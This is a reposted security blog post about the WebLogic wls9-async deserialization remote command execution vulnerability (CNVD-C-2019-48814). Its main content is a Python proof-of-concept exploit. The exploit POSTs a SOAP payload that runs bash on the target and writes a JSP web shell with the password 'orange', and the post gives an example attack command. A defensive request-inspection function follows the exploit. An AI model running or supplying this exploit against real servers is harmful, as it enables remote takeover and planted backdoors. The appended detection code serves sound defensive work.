CNVD-C-2019-48814 Vulnerability

Published: 2025/3/15

CNVD-C-2019-48814

WebLogic wls9-async deserialization remote command execution vulnerability


Detailed write-ups are available online (https://github.com/jas502n/CNVD-C-2019-48814)

(https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961)

Write a POC using the payload.

Exploitation: request url + _async/AsyncResponseService, check the status, POST the payload, then check whether a shell was obtained.

import requests
import sys

def poc():
    url = str(sys.argv[1])
    path = "/_async/AsyncResponseService"
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Content-Type': "text/xml"
    }
    payload = """<?xml version="1.0" encoding="Utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>echo 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|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>"""
    try:
        request = requests.post(url+path,data=payload,headers=headers)
        print '[+] exploit url: %s_async/AsyncResponseService' % url
        if request.status_code == 202:
            print '[+] %s exploit success!' % url
            request2 = requests.get(url+'/_async/shell.jsp')
            if request2.status_code == 200:
                print '[+] get shell: %s/_async/shell.jsp pass is orange ' % url
            else:
                print '[-] get shell fail '
        else:
            print '[-] %s exploit faile' % url
    except:
        print '[-] %s address cannot connect' % url

if __name__=='__main__':
    poc()

Attack:

python CNVD-C-2019-48814.py http://111.111.111.111:7001/

After a successful attack you get a shell (GET); the password is orange.

Test failed.
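A defender-side check for the request described above, as an added example that is not part of the original post: it inspects a captured HTTP request and lists the classes referenced inside a WorkContext SOAP header on a POST to /_async/*. The function name `workcontext_classes` and the sample bodies are assumptions constructed for illustration, and the check is a heuristic rather than a complete signature.

```python
import re
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"  # namespace used by the payload above
ASYNC_PREFIX = "/_async/"                               # path prefix targeted above
CLASS_ATTR = re.compile(rb'class\s*=\s*["\']([\w.$]+)["\']')


def workcontext_classes(method, path, body):
    """Return the sorted class names referenced inside a WorkContext SOAP
    header of a POST to /_async/*, or [] when the request does not match."""
    if method.upper() != "POST" or not path.lower().startswith(ASYNC_PREFIX):
        return []
    if b"workcontext" not in body.lower():
        return []
    try:
        if b"<!doctype" in body.lower():
            # Do not hand DTD-bearing input to the parser; scan bytes instead.
            raise ET.ParseError("DTD present")
        root = ET.fromstring(body)
        found = {el.get("class")
                 for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS)
                 for el in ctx.iter() if el.get("class")}
    except ET.ParseError:
        # Malformed XML is still worth flagging: fall back to a byte-level scan.
        found = {m.decode("ascii", "replace") for m in CLASS_ATTR.findall(body)}
    return sorted(found)


# Constructed sample: same envelope shape as the payload above, command removed.
SAMPLE_SUSPECT = b"""<?xml version="1.0" encoding="Utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="0"/></void></java>
</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

# Constructed sample: an envelope with no WorkContext header at all.
SAMPLE_BENIGN = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body/></soapenv:Envelope>"""

# Constructed sample: truncated body with an unbound prefix (parser rejects it).
SAMPLE_BROKEN = b'<x><work:WorkContext><void class="java.lang.ProcessBuilder">'

if __name__ == "__main__":
    for name, body in [("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN),
                       ("broken", SAMPLE_BROKEN)]:
        print(name, workcontext_classes("POST", "/_async/AsyncResponseService", body))
```

Any non-empty result on a production server is worth reviewing together with the 202 response status that the script above treats as success.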

Reposted from: https://www.cnblogs.com/Oran9e/p/10772713.html
